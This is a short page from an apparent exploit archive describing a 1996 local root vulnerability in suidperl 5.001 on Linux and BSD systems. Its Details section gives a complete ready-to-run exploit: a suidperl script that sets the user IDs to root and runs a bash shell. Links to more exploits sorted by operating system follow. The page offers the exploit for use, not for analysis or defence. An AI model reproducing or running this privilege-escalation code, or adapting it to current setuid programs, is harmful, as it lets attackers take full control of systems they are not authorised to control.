![]() |
Summary |
---|
Description: | On systems that support saved set-user-IDs, perl isn't thorough enough in giving up its root priviledges. |
Author: | Jon Lewis (jlewis@inorganic5.fdt.net) wrote this basic exploit, though it has been modified. It is unclear who found the hole. |
Compromise: | root (local) |
Vulnerable Systems: | Systems that support saved set-user-IDs and set-group-IDs and have suid_perl 5.001 (and possibly below) installed. Many linux and *BSD boxes. |
Date: | June 1996 |
Details |
---|
#!/usr/bin/suidperl -U $ENV{PATH}="/bin:/usr/bin"; $>=0;$<=0; exec("/bin/bash");
More Exploits! |
---|
All OS's | Linux | Solaris/SunOS | Micro$oft |
*BSD | Macintosh | AIX | IRIX |
ULTRIX/Digital UNIX | HP/UX | SCO | Remote exploits |